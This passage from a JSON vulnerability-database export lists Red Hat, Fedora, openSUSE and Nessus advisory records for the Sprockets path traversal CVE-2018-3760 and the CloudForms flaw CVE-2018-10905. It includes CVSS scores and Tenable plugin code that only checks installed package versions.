Documentation for these changes is available from the Release Notes document.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-09-26T18:25:56", "type": "redhat", "title": "(RHSA-2018:2745) Important: CloudForms 4.5.5 security, bug fix and enhancement update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10905", "CVE-2018-3760"], "modified": "2018-09-26T18:26:57", "id": "RHSA-2018:2745", "href": "https://access.redhat.com/errata/RHSA-2018:2745", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-19T20:38:58", "description": "Red Hat CloudForms Management Engine delivers the insight, control, and automation needed to address the challenges of managing virtual environments. CloudForms Management Engine is built on Ruby on Rails, a model-view-controller (MVC) framework for web application development. 
Action Pack implements the controller and the view components.\n\nSecurity Fix(es):\n\n* cfme: Improper access control in dRuby allows local users to execute arbitrary commands as root (CVE-2018-10905)\n\n* rubygem-sprockets: Path traversal in forbidden_request?() can allow remote attackers to read arbitrary files (CVE-2018-3760)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nRed Hat would like to thank Stephen Gappinger (American Express) for reporting CVE-2018-10905.\n\nAdditional Changes:\n\nThis update fixes various bugs and adds enhancements. Documentation for these changes is available from the Release Notes document.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-09-04T17:51:21", "type": "redhat", "title": "(RHSA-2018:2561) Important: CloudForms 4.6.4 security, bug fix, and enhancement update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10905", "CVE-2018-3760"], "modified": "2018-09-04T17:52:37", "id": "RHSA-2018:2561", "href": 
"https://access.redhat.com/errata/RHSA-2018:2561", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:54", "description": "Sprockets is a Rack-based asset packaging system that concatenates and serves JavaScript, CoffeeScript, CSS, LESS, Sass, and SCSS. ", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-07-15T03:33:48", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: rubygem-sprockets-3.7.2-1.fc28", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-3760"], "modified": "2018-07-15T03:33:48", "id": "FEDORA:2E73F65F395E", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-21T08:17:54", "description": "Sprockets is a Rack-based asset packaging system that concatenates and serves JavaScript, CoffeeScript, CSS, LESS, Sass, and SCSS. 
", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-07-14T23:36:29", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: rubygem-sprockets-3.7.2-1.fc27", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-3760"], "modified": "2018-07-14T23:36:29", "id": "FEDORA:714376469796", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "suse": [{"lastseen": "2018-06-29T23:21:53", "description": "This update for rubygem-sprockets fixes the following issues:\n\n The following security vulnerability was addressed:\n\n - CVE-2018-3760: Fixed a directory traversal issue in\n sprockets/server.rb:forbidden_request?(), which allowed remote attackers\n to read arbitrary files via specially crafted requests. 
(boo#1098369)\n\n", "cvss3": {}, "published": "2018-06-29T21:15:11", "type": "suse", "title": "Security update for rubygem-sprockets (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2018-3760"], "modified": "2018-06-29T21:15:11", "id": "OPENSUSE-SU-2018:1854-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-06/msg00052.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-07-30T13:53:37", "description": "This update for rubygem-sprockets fixes the following issues:\n\n The following security vulnerability was addressed:\n\n - CVE-2018-3760: Fixed a path traversal issue in\n sprockets/server.rb:forbidden_request?(), which allowed remote attackers\n to read arbitrary files (bsc#1098369)\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n", "cvss3": {}, "published": "2018-07-28T16:02:02", "type": "suse", "title": "Security update for rubygem-sprockets (moderate)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2018-3760"], "modified": "2018-07-28T16:02:02", "id": "OPENSUSE-SU-2018:2124-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-07/msg00041.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "nessus": [{"lastseen": "2022-01-14T12:33:42", "description": "There is an information leak vulnerability in Sprockets. 
Versions Affected: 4.0.0.beta7 and lower, 3.7.1 and lower, 2.12.4 and lower.\n\nSpecially crafted requests can be used to access files that exists on the filesystem that is outside an application's root directory, when the Sprockets server is used in development.\n\nAll users running an affected release should either upgrade or use one of the work arounds immediately.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2021-03-12T00:00:00", "type": "nessus", "title": "Rails Sprockets 2.x < 2.12.5 / 3.x < 3.7.2 / 4.x < 4.0.0.beta8 Path Traversal", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-3760"], "modified": "2021-09-07T00:00:00", "cpe": ["cpe:2.3:a:sprockets_project:sprockets:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112718", "href": "https://www.tenable.com/plugins/was/112718", "sourceData": "No source data", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-05-22T16:06:00", "description": "Update to Sprockets 3.7.2. 
Fixes CVE-2018-3760:\nhttps://access.redhat.com/security/cve/cve-2018-3760\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2019-01-03T00:00:00", "type": "nessus", "title": "Fedora 28 : rubygem-sprockets (2018-2735a12b72)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-3760"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:rubygem-sprockets", "cpe:/o:fedoraproject:fedora:28"], "id": "FEDORA_2018-2735A12B72.NASL", "href": "https://www.tenable.com/plugins/nessus/120304", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-2735a12b72.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(120304);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2018-3760\");\n script_xref(name:\"FEDORA\", value:\"2018-2735a12b72\");\n\n script_name(english:\"Fedora 28 : rubygem-sprockets (2018-2735a12b72)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to Sprockets 3.7.2. 
Fixes CVE-2018-3760:\nhttps://access.redhat.com/security/cve/cve-2018-3760\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-3760\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-2735a12b72\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected rubygem-sprockets package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:rubygem-sprockets\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:28\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^28([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 28\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC28\", reference:\"rubygem-sprockets-3.7.2-1.fc28\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"rubygem-sprockets\");\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-05-22T16:11:33", "description": "This update for rubygem-sprockets fixes the following issues :\n\nThe following security vulnerability was addressed :\n\n - CVE-2018-3760: Fixed a path traversal issue in sprockets/server.rb:forbidden_request?(), which allowed remote attackers to read arbitrary files (bsc#1098369)\n\nThis update was imported from the SUSE:SLE-15:Update update project.", "cvss3": 
{"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2019-03-27T00:00:00", "type": "nessus", "title": "openSUSE Security Update : rubygem-sprockets (openSUSE-2019-542)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-3760"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:ruby2.5-rubygem-sprockets", "cpe:/o:novell:opensuse:15.0"], "id": "OPENSUSE-2019-542.NASL", "href": "https://www.tenable.com/plugins/nessus/123231", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2019-542.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(123231);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2018-3760\");\n\n script_name(english:\"openSUSE Security Update : rubygem-sprockets (openSUSE-2019-542)\");\n script_summary(english:\"Check for the openSUSE-2019-542 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for rubygem-sprockets fixes the following issues :\n\nThe following security vulnerability was addressed :\n\n - CVE-2018-3760: Fixed a path traversal issue in\n sprockets/server.rb:forbidden_request?(), which allowed\n remote attackers to read arbitrary files (bsc#1098369)\n\nThis update was imported from the SUSE:SLE-15:Update update project.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1098369\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected rubygem-sprockets package.\"\n );\n 
script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.5-rubygem-sprockets\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/27\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.0\", reference:\"ruby2.5-rubygem-sprockets-3.7.2-lp150.2.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ruby2.5-rubygem-sprockets\");\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-05-23T16:08:18", "description": "This update for rubygem-sprockets fixes the following issues :\n\nThe following security vulnerability was addressed :\n\n - CVE-2018-3760: Fixed a directory traversal issue in sprockets/server.rb:forbidden_request?(), which allowed remote attackers to read arbitrary files via specially crafted requests. 
(boo#1098369)", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2018-07-02T00:00:00", "type": "nessus", "title": "openSUSE Security Update : rubygem-sprockets (openSUSE-2018-686)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-3760"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:ruby2.1-rubygem-sprockets", "p-cpe:/a:novell:opensuse:ruby2.2-rubygem-sprockets", "p-cpe:/a:novell:opensuse:ruby2.3-rubygem-sprockets", "p-cpe:/a:novell:opensuse:ruby2.4-rubygem-sprockets", "cpe:/o:novell:opensuse:42.3"], "id": "OPENSUSE-2018-686.NASL", "href": "https://www.tenable.com/plugins/nessus/110831", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2018-686.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(110831);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2018-3760\");\n\n script_name(english:\"openSUSE Security Update : rubygem-sprockets (openSUSE-2018-686)\");\n script_summary(english:\"Check for the openSUSE-2018-686 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for rubygem-sprockets fixes the following issues :\n\nThe following security vulnerability was addressed :\n\n - CVE-2018-3760: Fixed a directory traversal issue in\n sprockets/server.rb:forbidden_request?(), which allowed\n remote attackers to read arbitrary files via specially\n crafted requests. 
(boo#1098369)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1098369\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected rubygem-sprockets packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.1-rubygem-sprockets\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.2-rubygem-sprockets\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.3-rubygem-sprockets\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.4-rubygem-sprockets\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.3\", reference:\"ruby2.1-rubygem-sprockets-3.3.5-5.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"ruby2.2-rubygem-sprockets-3.3.5-5.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"ruby2.3-rubygem-sprockets-3.3.5-5.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"ruby2.4-rubygem-sprockets-3.3.5-5.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ruby2.1-rubygem-sprockets / ruby2.2-rubygem-sprockets / etc\");\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-05-23T16:07:40", "description": "This update for rubygem-sprockets fixes the following issues :\n\nThe following security vulnerability was addressed :\n\n - CVE-2018-3760: Fixed a path traversal issue in 
sprockets/server.rb:forbidden_request?(), which allowed remote attackers to read arbitrary files (bsc#1098369)\n\nThis update was imported from the SUSE:SLE-15:Update update project.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2018-07-30T00:00:00", "type": "nessus", "title": "openSUSE Security Update : rubygem-sprockets (openSUSE-2018-773)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-3760"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:ruby2.5-rubygem-sprockets", "cpe:/o:novell:opensuse:15.0"], "id": "OPENSUSE-2018-773.NASL", "href": "https://www.tenable.com/plugins/nessus/111425", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2018-773.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(111425);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2018-3760\");\n\n script_name(english:\"openSUSE Security Update : rubygem-sprockets (openSUSE-2018-773)\");\n script_summary(english:\"Check for the openSUSE-2018-773 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for rubygem-sprockets fixes the following issues :\n\nThe following security vulnerability was addressed :\n\n - CVE-2018-3760: Fixed a path traversal issue in\n sprockets/server.rb:forbidden_request?(), which allowed\n remote attackers to read arbitrary files (bsc#1098369)\n\nThis update was imported from the SUSE:SLE-15:Update update project.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1098369\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected rubygem-sprockets package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.5-rubygem-sprockets\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") 